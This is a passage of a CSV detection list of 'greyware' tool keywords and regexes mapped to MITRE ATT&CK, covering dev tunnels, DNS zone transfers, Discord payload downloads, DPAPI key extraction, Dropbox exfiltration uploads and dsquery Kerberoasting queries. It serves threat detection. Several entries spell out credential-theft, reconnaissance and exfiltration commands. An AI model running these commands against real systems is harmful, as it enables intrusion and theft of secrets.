"*devtunnel host -p *",".{0,1000}devtunnel\shost\s\-p\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*devtunnel* user login -*",".{0,1000}devtunnel.{0,1000}\suser\slogin\s\-.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*devtunnel.exe *",".{0,1000}devtunnel\.exe\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*eun1.rel.tunnels.api.visualstudio.com*",".{0,1000}eun1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*euw.rel.tunnels.api.visualstudio.com*",".{0,1000}euw\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*global.rel.tunnels.api.visualstudio.com*",".{0,1000}global\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://*.*.devtunnels.ms*",".{0,1000}https\:\/\/.{0,1000}\..{0,1000}\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://*.brs.devtunnels.ms/*",".{0,1000}https\:\/\/.{0,1000}\.brs\.devtunnels\.ms\/.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://*.euw.devtunnels.ms*",".{0,1000}https\:\/\/.{0,1000}\.euw\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://*.use.devtunnels.ms*",".{0,1000}https\:\/\/.{0,1000}\.use\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://aka.ms/DevTunnelCliInstall*",".{0,1000}https\:\/\/aka\.ms\/DevTunnelCliInstall.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*inc1.rel.tunnels.api.visualstudio.com*",".{0,1000}inc1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Microsoft.DevTunnels.Connections.dll*",".{0,1000}Microsoft\.DevTunnels\.Connections\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Microsoft.DevTunnels.Contracts.dll*",".{0,1000}Microsoft\.DevTunnels\.Contracts\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Microsoft.DevTunnels.Management.dll*",".{0,1000}Microsoft\.DevTunnels\.Management\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Microsoft.DevTunnels.Ssh.dll*",".{0,1000}Microsoft\.DevTunnels\.Ssh\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Microsoft.DevTunnels.Ssh.Tcp.dll*",".{0,1000}Microsoft\.DevTunnels\.Ssh\.Tcp\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*ssh @ssh.*.devtunnels.ms*",".{0,1000}ssh\s\@ssh\..{0,1000}\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*tunnels-prod-rel-tm.trafficmanager.net*",".{0,1000}tunnels\-prod\-rel\-tm\.trafficmanager\.net.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*uks1.rel.tunnels.api.visualstudio.com*",".{0,1000}uks1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*use.rel.tunnels.api.visualstudio.com*",".{0,1000}use\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*use2.rel.tunnels.api.visualstudio.com*",".{0,1000}use2\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*usw2.rel.tunnels.api.visualstudio.com*",".{0,1000}usw2\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*usw3.rel.tunnels.api.visualstudio.com*",".{0,1000}usw3\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*",".{0,1000}wss\:\/\/.{0,1000}\.tunnels\.api\.visualstudio\.com\/api\/v1\/Connect\/.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*dig * axfr *@*",".{0,1000}dig\s.{0,1000}\saxfr\s.{0,1000}\@.{0,1000}","greyware_tool_keyword","dig","classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*dig *@* axfr*",".{0,1000}dig\s.{0,1000}\@.{0,1000}\saxfr.{0,1000}","greyware_tool_keyword","dig","classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* dir /s */ Microsoft.ActiveDirectory.Management.dll*",".{0,1000}\sdir\s\/s\s.{0,1000}\/\sMicrosoft\.ActiveDirectory\.Management\.dll.{0,1000}","greyware_tool_keyword","dir","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","TA0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*dir /b/a %appdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%appdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","greyware_tool_keyword","dir","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%localappdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","greyware_tool_keyword","dir","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*https://media.discordapp.net/attachments/*.bat*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.exe*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.hta*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.iso*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.iso.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.jar*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.msi*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.py*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.py.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.vbs*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*https://media.discordapp.net/attachments/*.zip*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A"
"*diskshadow list shadows all*",".{0,1000}diskshadow\slist\sshadows\sall.{0,1000}","greyware_tool_keyword","diskshadow","List shadow copies using diskshadow","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"* denied AXFR from *",".{0,1000}\sdenied\sAXFR\sfrom\s.{0,1000}","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"* dropping source port zero packet from *",".{0,1000}\sdropping\ssource\sport\szero\spacket\sfrom\s.{0,1000}","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"* exiting (due to fatal error)*",".{0,1000}\sexiting\s\(due\sto\sfatal\serror\).{0,1000}","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*dnscmd . /enumrecords /zone *",".{0,1000}dnscmd\s\.\s\/enumrecords\s\/zone\s.{0,1000}","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*dnscmd . /enumzones*",".{0,1000}dnscmd\s\.\s\/enumzones.{0,1000}","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*.dnslog.cn:*",".{0,1000}\.dnslog\.cn\:.{0,1000}","greyware_tool_keyword","dnslog.cn","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://dnslog.cn","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A"
"*http://dnslog.cn/*",".{0,1000}http\:\/\/dnslog\.cn\/.{0,1000}","greyware_tool_keyword","dnslog.cn","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://dnslog.cn","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A"
"*kpiecbcckbofpmkkkdibbllpinceiihk*",".{0,1000}kpiecbcckbofpmkkkdibbllpinceiihk.{0,1000}","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*mjolnodfokkkaichkcjipfgblbfgojpa*",".{0,1000}mjolnodfokkkaichkcjipfgblbfgojpa.{0,1000}","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*dpapi.py backupkeys -t */*@*",".{0,1000}dpapi\.py\sbackupkeys\s\-t\s.{0,1000}\/.{0,1000}\@.{0,1000}","greyware_tool_keyword","dpapi.py","the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. gaining unauthorized access to other systems and resources.","T1552.006","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://content.dropboxapi.com/2/files/upload*",".{0,1000}https\:\/\/content\.dropboxapi\.com\/2\/files\/upload.{0,1000}","greyware_tool_keyword","dropbox","uploading file to dropbox with the API","T1105 - T1071.001 - T1567.002","TA0011 - TA0009 - TA0010","N/A","BlackCat - Scattered Spider*","Data Exfiltration","https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md","1","1","N/A","N/A","6","10","1064","118","2024-06-16T04:10:39Z","2022-05-10T04:12:53Z"
"*https://dropmefiles.com/*",".{0,1000}https\:\/\/dropmefiles\.com\/.{0,1000}","greyware_tool_keyword","dropmefiles.com","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Mallox","Collection","https://github.com/Casualtek/Ransomchats/blob/4a25ac6ad165a4e600aeb72718c3ad41e8f6ce3a/Mallox/20230427.json#L286C25-L286C48","1","1","N/A","downloading files url","8","5","410","38","2024-08-30T10:51:23Z","2023-05-02T16:17:48Z"
"*https://dropmefiles.com/s3/upload/*",".{0,1000}https\:\/\/dropmefiles\.com\/s3\/upload\/.{0,1000}","greyware_tool_keyword","dropmefiles.com","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Mallox","Data Exfiltration","https://github.com/Casualtek/Ransomchats/blob/4a25ac6ad165a4e600aeb72718c3ad41e8f6ce3a/Mallox/20230427.json#L286C25-L286C48","1","1","N/A","uploading files url","10","5","410","38","2024-08-30T10:51:23Z","2023-05-02T16:17:48Z"
"*dsquery * -filter *(objectClass=trustedDomain)* -attr *",".{0,1000}dsquery\s.{0,1000}\s\-filter\s.{0,1000}\(objectClass\=trustedDomain\).{0,1000}\s\-attr\s.{0,1000}","greyware_tool_keyword","dsquery","enumerate domain trusts with dsquery","T1482 - T1018","TA0007","N/A","APT41 - FIN8","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=32.{0,1000}","greyware_tool_keyword","dsquery","Finding users Not Required to Have a Password","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=4194304.{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with Kerberos Pre-Authentication Disabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*-filter *(&(objectClass=User)(msDS-AllowedToDelegateTo=*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectClass\=User\)\(msDS\-AllowedToDelegateTo\=.{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with constrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*-filter *(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(samaccounttype=805306369*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectClass\=user\)\(servicePrincipalName\=.{0,1000}\)\(!\(cn\=krbtgt\)\)\(!\(samaccounttype\=805306369.{0,1000}","greyware_tool_keyword","dsquery","Finding Kerberoastable Users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*-filter *(&(objectClass=User)(serviceprincipalname=*)(samaccountname=* -limit 0 -attr samaccountname serviceprincipalname*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectClass\=User\)\(serviceprincipalname\=.{0,1000}\)\(samaccountname\=.{0,1000}\s\-limit\s0\s\-attr\ssamaccountname\sserviceprincipalname.{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with SPNs","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*-filter *(userAccountControl:1.2.840.113556.1.4.803:=524288)*",".{0,1000}\-filter\s.{0,1000}\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\).{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with unconstrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/DuckDNS.7z*",".{0,1000}\/DuckDNS\.7z.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*/DuckDNS.git*",".{0,1000}\/DuckDNS\.git.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*/DuckDNS.zip""*",".{0,1000}\/DuckDNS\.zip\"".{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
